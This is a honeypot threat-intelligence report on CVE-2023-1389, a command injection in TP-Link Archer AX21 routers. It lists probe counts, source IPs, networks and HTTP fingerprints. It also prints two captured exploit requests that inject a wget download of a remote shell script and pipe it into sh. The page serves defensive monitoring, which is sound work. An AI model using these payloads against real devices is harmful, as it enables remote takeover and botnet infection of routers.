CVE-2023-1389: TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection
HoneyLabs honeypots recorded 27 probes matching CVE-2023-1389 from 2 distinct source IP addresses in the last 7 days. Severity is rated critical.
This CVE is on CISA's Known Exploited Vulnerabilities list.
Request paths that identify it
- /cgi-bin/luci/;stok=/locale?form=country
Addresses probing it
| Source IP | Probes | Network | Country |
|---|---|---|---|
| 89.42.231.200 | 25 | Amarutu Technology Ltd | The Netherlands |
| 221.159.119.6 | 2 | Korea Telecom | South Korea |
Networks it comes from
| ASN | Organisation | Probes | Source IPs |
|---|---|---|---|
| AS206264 | Amarutu Technology Ltd | 25 | 1 |
| AS4766 | Korea Telecom | 2 | 1 |
Captured requests
- /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F162.249.125.145%2Fooo.sh+-O-+|+sh%60)
- /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh)
HTTP client fingerprints (JA4H)
- ge11nn0200_3ed38b250d3d
- ge11nn0100_4740ae6347b0
CVE report
CVE report
Open a specific CVE from the CVE tracker.